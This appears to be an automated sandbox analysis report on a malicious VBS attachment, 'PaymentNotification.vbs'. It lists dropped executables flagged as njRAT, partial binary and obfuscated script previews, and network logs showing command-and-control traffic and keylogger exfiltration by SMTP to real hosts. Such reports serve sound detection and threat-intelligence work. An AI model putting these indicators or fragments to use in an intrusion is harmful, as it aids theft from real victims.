SSDEEP:	49152:nLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL7:
MD5:	08C62FEA3D61370C3CA97568656D8304
SHA1:	2EF6CE8EF54231434E46A51F8604DC72C6831246
SHA-256:	52CA7E417C7A85F7E7337BE8DDD76A3B2508343DD63B4C274C34D9B513907BF5
SHA-512:	C3B5D0C62BCF015AA363786FDC12675400A4A1177E4DFF5F4B9099CD5A05D316372AC32E1E276171385B2941A3C27843758BBA7DBA5F898966AD27B8B7160BE7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, Author: Brian Wallace @botnet_hunter
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N..`............................N&... ........@.. ....................................@..................................%..W....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H...........i......Y...$...............................................&.(..........(........s.........s.........s.........s.........s..............0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+..*.0.................,.........o....-..+.......9....~..............,3~.........(....o........,.r...p......(....s....z.+..s..........~.........(.....o......(...+..}.ru....%-.&.+.%.(.....o....

C:\Users\user\AppData\Roaming\pid.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	6E616E79D491BA42638558CAF0364003
SHA1:	74F5C11138CDB6F32822F4120E4F4F9D027D3EBB
SHA-256:	23850EB82A923C694AFCFF74746BFEC1AF8099C034E73EFF71978FCEF7A23FD3
SHA-512:	091AEE6AAD44DADDA5E2FEDA9E2363722434F815BCD0FB0270E1DD9F9C1F5B0740C8CC302170682C58DDC86F8F4CF6B330B6393E8ABDF000B9128B3044F7B182
Malicious:	false
Preview:	4928

C:\Users\user\AppData\Roaming\pidloc.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	52
Entropy (8bit):	4.3728327481476805
Encrypted:	false
SSDEEP:	3:oNN+E2J5xAIMig:oNN723ftg
MD5:	3C9A412CE21ACF36264B3DA202706434
SHA1:	1D1F182C985DA55FABC80E25A5E8F4047B24EA3E
SHA-256:	EDFF7D00050F7D79BA480C90741880859E5B1D31DE462FE0088D029315A39DB3
SHA-512:	629A0BEC067E72B4E292AFFD7526A3BE35258EFBF358A5C891FD0D2B77F25F05EB80CAFFDACCF5E01D44BC8D3459E70F0EE43A1D95503B5207496B02D41EE7B0
Malicious:	false
Preview:	C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe

C:\Users\user\AppData\Roaming\servieda.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\Tmp.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.550691485739008
Encrypted:	false
SSDEEP:	768:Xq47KHbq7NIowMZVHC8kUYUsFWn4UVm7JsWYKcOvt9t9cFKpBBDZ0DauldK:Ubq7JrDCR3UP4UVkRYw/tekpBBWdK
MD5:	9B30598F8F05C46F8ABB22A4C2ABCC9E
SHA1:	73665A73C48C889AF51EC9C99D8432218676B0CD
SHA-256:	2E5075A95C5663256555E292409149B4522F76FBE63BB48665213006C2D5CA2A
SHA-512:	35B2D08550387CAFED531B6EE3BA81CF1567E0E6934263044896060E39C6A865A8176A9817E259DD0527FC021E2DC9C9845649125EDF5CBFF1FB198AF3175360
Malicious:	true
Yara Hits:	Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Brian Wallace @botnet_hunter
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 78%, Browse Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N..`............................N&... ........@.. ....................................@..................................%..W....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H...........i......Y...$...............................................&.(..........(........s.........s.........s.........s.........s..............0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+..*.0.................,.........o....-..+.......9....~..............,3~.........(....o........,.r...p......(....s....z.+..s..........~.........(.....o......(...+..}.ru....%-.&.+.%.(.....o....

\Device\ConDrv Download File
Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	313
Entropy (8bit):	4.971939296804078
Encrypted:	false
SSDEEP:	6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
MD5:	689E2126A85BF55121488295EE068FA1
SHA1:	09BAAA253A49D80C18326DFBCA106551EBF22DD6
SHA-256:	D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
SHA-512:	C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
Malicious:	false
Preview:	..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....

Static File Info

General
File type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Entropy (8bit):	3.5935554485710077
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	PaymentNotification.vbs
File size:	356096
MD5:	f5b9f4ae6470dd78d53b60dcc6b32a5b
SHA1:	c12a160ff346463dfea1a2a5b015b0efd56a9645
SHA256:	3fb7c96dcb667562f755e56f05a892aa8326d0c905055f1ea75177e1785df46b
SHA512:	891a78a7fae35b7bec30254bd88c458c940ec25c347f9f0ff0e83fa23a93b166d80f825b74a57781ebfb3e55a80a355131677db32a5510e86728fae4977e9bef
SSDEEP:	3072:N3n1hOhJ4d+NxpBmFxHJCABjHf67j4be1:N3ahs+7aBjHy7j4q1
File Content Preview:	..U.n.S.N. .=. .(.".=.=.Q.K.i.U.G.e.l.5.i.c.n.B.H.X.i. ..+..+..+..+..+.. .". .+. ._. .....".i.J.g.Y.X.Z.E.F.G.a.T.h.i.b.1.J.n.L.s.V.H.d.o.N. ./.4.5.6./.Z.h.h.2.b.5.p.H.b.6.h. ./.4.5.6./.Y.n.R.3.b.q.V.G.a. ./.4.5.6./.h. ./.4.5.6./.C.N.k.C.M.w. ..+.

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/28/21-20:49:31.646373	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.681609	ICMP	449	ICMP Time-To-Live Exceeded in Transit			84.17.52.126	192.168.2.6
04/28/21-20:49:31.682134	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.717620	ICMP	449	ICMP Time-To-Live Exceeded in Transit			149.11.89.129	192.168.2.6
04/28/21-20:49:31.718700	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.755896	ICMP	449	ICMP Time-To-Live Exceeded in Transit			130.117.49.165	192.168.2.6
04/28/21-20:49:31.757037	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.799677	ICMP	449	ICMP Time-To-Live Exceeded in Transit			130.117.0.18	192.168.2.6
04/28/21-20:49:31.811880	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.858721	ICMP	449	ICMP Time-To-Live Exceeded in Transit			154.54.36.53	192.168.2.6
04/28/21-20:49:31.878720	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.925196	ICMP	449	ICMP Time-To-Live Exceeded in Transit			130.117.15.66	192.168.2.6
04/28/21-20:49:31.925617	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:31.989344	ICMP	449	ICMP Time-To-Live Exceeded in Transit			195.22.208.117	192.168.2.6
04/28/21-20:49:31.989900	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:32.042782	ICMP	449	ICMP Time-To-Live Exceeded in Transit			93.186.128.39	192.168.2.6
04/28/21-20:49:32.043298	ICMP	384	ICMP PING			192.168.2.6	2.23.155.226
04/28/21-20:49:32.095652	ICMP	408	ICMP Echo Reply			2.23.155.226	192.168.2.6
04/28/21-20:50:00.545812	TCP	2021176	ET TROJAN Bladabindi/njRAT CnC Command (ll)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:10.806596	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:13.866114	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:19.524323	TCP	2022062	ET TROJAN njrat ver 0.7d Malware CnC Callback Response (File Manager)	3429	49706	185.140.53.71	192.168.2.6
04/28/21-20:50:20.210801	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:21.271866	TCP	2019216	ET TROJAN njrat ver 0.7d Malware CnC Callback (Message)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:22.960689	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:26.000113	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:28.681312	TCP	2030673	ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)	5622	49715	185.140.53.71	192.168.2.6
04/28/21-20:50:29.833873	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:36.102041	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:40.143989	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:48.411842	TCP	2022062	ET TROJAN njrat ver 0.7d Malware CnC Callback Response (File Manager)	3429	49706	185.140.53.71	192.168.2.6
04/28/21-20:50:49.632938	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:49.949509	TCP	2019216	ET TROJAN njrat ver 0.7d Malware CnC Callback (Message)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:52.219899	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:52.553161	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:55.242661	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:50:55.724475	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49724	104.16.154.36	192.168.2.6
04/28/21-20:50:58.275348	TCP	2019214	ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture)	49706	3429	192.168.2.6	185.140.53.71
04/28/21-20:51:00.137141	TCP	2019926	ET TROJAN HawkEye Keylogger Report SMTP	49726	587	192.168.2.6	103.6.196.196
04/28/21-20:51:10.877411	TCP	2019926	ET TROJAN HawkEye Keylogger Report SMTP	49732	587	192.168.2.6	103.6.196.196

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 28, 2021 20:49:37.990577936 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.195584059 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.195766926 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.219413996 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.424576044 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.424655914 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.424707890 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.424758911 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.424762011 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.424798965 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.424804926 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.424869061 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.428610086 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.428675890 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.428745031 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.428819895 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.481906891 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.687988997 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.688313961 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.688452005 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.726054907 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:38.931335926 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.946767092 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:38.946872950 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:39.932044983 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:39.932076931 CEST	443	49699	207.241.227.114	192.168.2.6
Apr 28, 2021 20:49:39.932221889 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:55.773941040 CEST	49705	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:49:56.026283979 CEST	5471	49705	185.140.53.71	192.168.2.6
Apr 28, 2021 20:49:56.373271942 CEST	49699	443	192.168.2.6	207.241.227.114
Apr 28, 2021 20:49:56.531897068 CEST	49705	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:49:56.797717094 CEST	5471	49705	185.140.53.71	192.168.2.6
Apr 28, 2021 20:49:57.298255920 CEST	49705	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:49:57.555747032 CEST	5471	49705	185.140.53.71	192.168.2.6
Apr 28, 2021 20:49:59.948956013 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:00.093055964 CEST	49707	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:00.198863029 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:00.198971987 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:00.342957020 CEST	5471	49707	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:00.545811892 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:00.844831944 CEST	49707	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:00.877640963 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:00.877872944 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:01.134840965 CEST	5471	49707	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:01.204977989 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:01.641880989 CEST	49707	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:01.906229019 CEST	5471	49707	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:04.411237955 CEST	49708	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:04.702158928 CEST	5471	49708	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:05.204546928 CEST	49708	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:05.466819048 CEST	5471	49708	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:05.877341032 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:05.970139980 CEST	49708	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:06.215763092 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:06.226924896 CEST	5471	49708	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:06.479783058 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:06.483153105 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:06.796451092 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:08.738342047 CEST	49709	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:08.992042065 CEST	5471	49709	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:09.501801014 CEST	49709	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:09.722892046 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:09.767294884 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:09.773319006 CEST	5471	49709	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:10.283020020 CEST	49709	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:10.563333035 CEST	5471	49709	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:10.806596041 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:11.120780945 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:13.288209915 CEST	49710	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:13.570292950 CEST	5471	49710	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:13.768337965 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:13.814531088 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:13.866113901 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:14.080163956 CEST	49710	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:14.175697088 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:14.268445015 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:14.326714993 CEST	5471	49710	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:14.574331045 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:14.830269098 CEST	49710	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:15.082739115 CEST	5471	49710	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:17.600140095 CEST	49711	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:17.852123976 CEST	5471	49711	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:18.357610941 CEST	49711	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:18.605947971 CEST	5471	49711	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.118047953 CEST	49711	5471	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.381472111 CEST	5471	49711	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.524322987 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.524430037 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.524538994 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.525321960 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.525345087 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.525717974 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.526730061 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.526819944 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.526949883 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.527431965 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.527494907 CEST	49706	3429	192.168.2.6	185.140.53.71
Apr 28, 2021 20:50:19.528115988 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.528239965 CEST	3429	49706	185.140.53.71	192.168.2.6
Apr 28, 2021 20:50:19.528333902 CEST	49706	3429	192.168.2.6	185.140.53.71

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 28, 2021 20:49:28.019202948 CEST	57773	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:28.070158958 CEST	53	57773	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:29.010178089 CEST	59986	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:29.059096098 CEST	53	59986	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:29.901109934 CEST	52478	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:29.950100899 CEST	53	52478	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:31.285599947 CEST	58931	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:31.343779087 CEST	53	58931	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:31.580931902 CEST	57725	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:31.645327091 CEST	53	57725	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:32.370460987 CEST	49283	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:32.427886009 CEST	53	49283	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:33.277038097 CEST	58377	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:33.325942039 CEST	53	58377	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:34.367306948 CEST	55074	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:34.417165041 CEST	53	55074	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:35.454207897 CEST	54513	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:35.502916098 CEST	53	54513	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:36.502357006 CEST	62044	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:36.551178932 CEST	53	62044	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:37.441314936 CEST	63791	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:37.492192984 CEST	53	63791	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:37.913492918 CEST	64267	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:37.971016884 CEST	53	64267	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:38.353760958 CEST	49448	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:38.402816057 CEST	53	49448	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:39.354316950 CEST	60342	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:39.405952930 CEST	53	60342	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:40.480726957 CEST	61346	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:40.529692888 CEST	53	61346	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:41.518815994 CEST	51774	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:41.576204062 CEST	53	51774	8.8.8.8	192.168.2.6
Apr 28, 2021 20:49:42.428302050 CEST	56023	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:49:42.485542059 CEST	53	56023	8.8.8.8	192.168.2.6
Apr 28, 2021 20:50:23.262248993 CEST	58384	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:50:23.323628902 CEST	53	58384	8.8.8.8	192.168.2.6
Apr 28, 2021 20:50:30.550821066 CEST	60261	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:50:30.602368116 CEST	53	60261	8.8.8.8	192.168.2.6
Apr 28, 2021 20:50:55.257371902 CEST	56061	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:50:55.317194939 CEST	53	56061	8.8.8.8	192.168.2.6
Apr 28, 2021 20:50:55.510035992 CEST	58336	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:50:55.572010994 CEST	53	58336	8.8.8.8	192.168.2.6
Apr 28, 2021 20:50:56.580599070 CEST	53781	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:50:57.249634027 CEST	53	53781	8.8.8.8	192.168.2.6
Apr 28, 2021 20:51:04.466546059 CEST	54064	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:51:04.547173977 CEST	53	54064	8.8.8.8	192.168.2.6
Apr 28, 2021 20:51:07.489036083 CEST	52811	53	192.168.2.6	8.8.8.8
Apr 28, 2021 20:51:08.224945068 CEST	53	52811	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 28, 2021 20:49:37.913492918 CEST	192.168.2.6	8.8.8.8	0xbeed	Standard query (0)	ia601504.us.archive.org	A (IP address)	IN (0x0001)
Apr 28, 2021 20:50:55.257371902 CEST	192.168.2.6	8.8.8.8	0xbd47	Standard query (0)	81.189.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 28, 2021 20:50:55.510035992 CEST	192.168.2.6	8.8.8.8	0x8ee5	Standard query (0)	whatismyipaddress.com	A (IP address)	IN (0x0001)
Apr 28, 2021 20:50:56.580599070 CEST	192.168.2.6	8.8.8.8	0xb64b	Standard query (0)	mail.neesoontat.com.my	A (IP address)	IN (0x0001)
Apr 28, 2021 20:51:07.489036083 CEST	192.168.2.6	8.8.8.8	0xaf62	Standard query (0)	mail.neesoontat.com.my	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 28, 2021 20:49:37.971016884 CEST	8.8.8.8	192.168.2.6	0xbeed	No error (0)	ia601504.us.archive.org		207.241.227.114	A (IP address)	IN (0x0001)
Apr 28, 2021 20:50:55.317194939 CEST	8.8.8.8	192.168.2.6	0xbd47	Name error (3)	81.189.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 28, 2021 20:50:55.572010994 CEST	8.8.8.8	192.168.2.6	0x8ee5	No error (0)	whatismyipaddress.com		104.16.154.36	A (IP address)	IN (0x0001)
Apr 28, 2021 20:50:55.572010994 CEST	8.8.8.8	192.168.2.6	0x8ee5	No error (0)	whatismyipaddress.com		104.16.155.36	A (IP address)	IN (0x0001)
Apr 28, 2021 20:50:57.249634027 CEST	8.8.8.8	192.168.2.6	0xb64b	No error (0)	mail.neesoontat.com.my	neesoontat.com.my		CNAME (Canonical name)	IN (0x0001)
Apr 28, 2021 20:50:57.249634027 CEST	8.8.8.8	192.168.2.6	0xb64b	No error (0)	neesoontat.com.my		103.6.196.196	A (IP address)	IN (0x0001)
Apr 28, 2021 20:51:08.224945068 CEST	8.8.8.8	192.168.2.6	0xaf62	No error (0)	mail.neesoontat.com.my	neesoontat.com.my		CNAME (Canonical name)	IN (0x0001)
Apr 28, 2021 20:51:08.224945068 CEST	8.8.8.8	192.168.2.6	0xaf62	No error (0)	neesoontat.com.my		103.6.196.196	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

whatismyipaddress.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49724	104.16.154.36	80	C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe

Timestamp	kBytes transferred	Direction	Data
Apr 28, 2021 20:50:55.668230057 CEST	884	OUT	GET / HTTP/1.1 Host: whatismyipaddress.com Connection: Keep-Alive
